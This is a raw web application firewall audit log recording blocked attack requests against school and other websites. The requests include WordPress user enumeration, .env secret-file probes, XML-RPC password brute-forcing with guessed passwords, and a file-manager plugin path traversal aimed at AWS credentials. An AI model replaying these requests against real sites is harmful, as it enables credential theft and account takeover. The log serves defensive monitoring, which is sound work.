Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb4d0177-Z-- --9393aa6c-A-- [24/May/2025:14:33:49 +0700] aDF2XeO2UzDOKMmK0i6i6gAAABU 103.236.140.4 51130 103.236.140.4 8181 --9393aa6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.232.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.232.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9393aa6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9393aa6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072029668870 3163 (- - -) Stopwatch2: 1748072029668870 3163; combined=1380, p1=459, p2=889, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9393aa6c-Z-- --85f7b142-A-- [24/May/2025:14:35:30 +0700] aDF2wjvI5DIWBJ2mFG5LGAAAAMU 103.236.140.4 51158 103.236.140.4 8181 --85f7b142-B-- GET / HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 54.188.172.214 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 54.188.172.214 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.9 Proxy-Connection: Keep-Alive --85f7b142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85f7b142-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072130474063 2021 (- - -) Stopwatch2: 1748072130474063 2021; combined=833, p1=408, p2=396, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85f7b142-Z-- --8056c051-A-- [24/May/2025:14:35:30 +0700] aDF2wvmzt4abyoi_U9n-uwAAAJc 103.236.140.4 51160 103.236.140.4 8181 --8056c051-B-- GET / HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 35.93.69.52 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 35.93.69.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.9 Proxy-Connection: Keep-Alive --8056c051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8056c051-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072130474100 2120 (- - -) Stopwatch2: 1748072130474100 2120; combined=848, p1=405, p2=406, p3=0, p4=0, p5=37, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8056c051-Z-- --c38dfd1a-A-- [24/May/2025:14:35:55 +0700] aDF22-O2UzDOKMmK0i6i7gAAAAE 103.236.140.4 51176 103.236.140.4 8181 --c38dfd1a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c38dfd1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c38dfd1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748072155536392 848 (- - -) Stopwatch2: 1748072155536392 848; combined=320, p1=271, p2=0, p3=0, p4=0, p5=49, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c38dfd1a-Z-- --ba893d74-A-- [24/May/2025:14:44:21 +0700] aDF41eunkxaVeh4NwhbSAgAAAE8 103.236.140.4 51374 103.236.140.4 8181 --ba893d74-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 149.36.17.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 149.36.17.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ba893d74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba893d74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072661757744 3046 (- - -) Stopwatch2: 1748072661757744 3046; combined=1360, p1=497, p2=833, p3=0, p4=0, p5=30, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba893d74-Z-- --d772db24-A-- [24/May/2025:14:45:16 +0700] aDF5DOO2UzDOKMmK0i6i_gAAAAA 103.236.140.4 51418 103.236.140.4 8181 --d772db24-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 Accept-Charset: utf-8 --d772db24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d772db24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748072716634979 661 (- - -) Stopwatch2: 1748072716634979 661; combined=264, p1=228, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d772db24-Z-- --1b272669-A-- [24/May/2025:14:47:45 +0700] aDF5ofmzt4abyoi_U9n-8QAAAI0 103.236.140.4 51482 103.236.140.4 8181 --1b272669-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 137.184.206.114 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 137.184.206.114 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1b272669-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinSonnx123!@# --1b272669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b272669-E-- --1b272669-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 137.184.206.114 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748072865649453 5020 (- - -) Stopwatch2: 1748072865649453 5020; combined=3703, p1=381, p2=3149, p3=0, p4=0, p5=104, sr=78, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b272669-Z-- --d5429544-A-- [24/May/2025:14:50:18 +0700] aDF6OjvI5DIWBJ2mFG5LPQAAAMQ 103.236.140.4 51576 103.236.140.4 8181 --d5429544-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 137.184.206.114 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 137.184.206.114 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d5429544-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihintestsolihin --d5429544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5429544-E-- --d5429544-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 137.184.206.114 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748073018623612 6123 (- - -) Stopwatch2: 1748073018623612 6123; combined=4348, p1=491, p2=3684, p3=0, p4=0, p5=102, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5429544-Z-- --d3340d48-A-- [24/May/2025:14:52:32 +0700] aDF6wOO2UzDOKMmK0i6jEgAAABA 103.236.140.4 51694 103.236.140.4 8181 --d3340d48-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 137.184.206.114 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 137.184.206.114 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d3340d48-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinJarvis@2025 --d3340d48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3340d48-E-- --d3340d48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 137.184.206.114 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748073152196243 6385 (- - -) Stopwatch2: 1748073152196243 6385; combined=4591, p1=519, p2=3777, p3=0, p4=0, p5=168, sr=103, sw=127, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3340d48-Z-- --6555552d-A-- [24/May/2025:15:07:52 +0700] aDF-V-O2UzDOKMmK0i6jaAAAAAo 103.236.140.4 52016 103.236.140.4 8181 --6555552d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.202.254.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.202.254.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6555552d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6555552d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748074071999021 2943 (- - -) Stopwatch2: 1748074071999021 2943; combined=1303, p1=452, p2=821, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6555552d-Z-- --1914a218-A-- [24/May/2025:15:09:02 +0700] aDF-nuO2UzDOKMmK0i6jbwAAAAs 103.236.140.4 52046 103.236.140.4 8181 --1914a218-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=file&target=l1_Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL3Jvb3QvLmF3cy9jcmVkZW50aWFscw== HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644029 --1914a218-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1914a218-E-- --1914a218-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748074142042905 4277 (- - -) Stopwatch2: 1748074142042905 4277; combined=2566, p1=484, p2=2048, p3=0, p4=0, p5=33, sr=77, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1914a218-Z-- --724d6c24-A-- [24/May/2025:15:09:18 +0700] aDF-ruO2UzDOKMmK0i6jeQAAABU 103.236.140.4 52046 103.236.140.4 8181 --724d6c24-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644045 --724d6c24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --724d6c24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074158605058 666 (- - -) Stopwatch2: 1748074158605058 666; combined=298, p1=263, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --724d6c24-Z-- --f08e916c-A-- [24/May/2025:15:09:19 +0700] aDF-rzvI5DIWBJ2mFG5LXwAAAMM 103.236.140.4 52086 103.236.140.4 8181 --f08e916c-B-- GET /.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029869 --f08e916c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f08e916c-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074159835128 683 (- - -) Stopwatch2: 1748074159835128 683; combined=276, p1=240, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f08e916c-Z-- --396e5e5c-A-- [24/May/2025:15:09:21 +0700] aDF-sTvI5DIWBJ2mFG5LYAAAAMc 103.236.140.4 52090 103.236.140.4 8181 --396e5e5c-B-- GET /.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644048 --396e5e5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --396e5e5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074161071000 666 (- - -) Stopwatch2: 1748074161071000 666; combined=248, p1=218, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --396e5e5c-Z-- --96094f0d-A-- [24/May/2025:15:09:23 +0700] aDF-s_mzt4abyoi_U9n_EgAAAIU 103.236.140.4 52094 103.236.140.4 8181 --96094f0d-B-- GET /wp-content/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644051 --96094f0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --96094f0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074163640211 626 (- - -) Stopwatch2: 1748074163640211 626; combined=294, p1=260, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96094f0d-Z-- --1c2cd122-A-- [24/May/2025:15:09:25 +0700] aDF-tDvI5DIWBJ2mFG5LYQAAAM8 103.236.140.4 52102 103.236.140.4 8181 --1c2cd122-B-- GET /application/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029875 --1c2cd122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1c2cd122-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074164986517 13849 (- - -) Stopwatch2: 1748074164986517 13849; combined=26574, p1=238, p2=0, p3=0, p4=0, p5=13185, sr=65, sw=0, l=0, gc=13151 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c2cd122-Z-- --f53b8a2e-A-- [24/May/2025:15:09:26 +0700] aDF-tvmzt4abyoi_U9n_EwAAAJI 103.236.140.4 52106 103.236.140.4 8181 --f53b8a2e-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644054 --f53b8a2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f53b8a2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074166294651 752 (- - -) Stopwatch2: 1748074166294651 752; combined=304, p1=267, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f53b8a2e-Z-- --67bc6751-A-- [24/May/2025:15:09:27 +0700] aDF-t-O2UzDOKMmK0i6jegAAABA 103.236.140.4 52110 103.236.140.4 8181 --67bc6751-B-- GET /config/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029878 --67bc6751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --67bc6751-H-- Message: Access denied with code 403 (phase 1). 
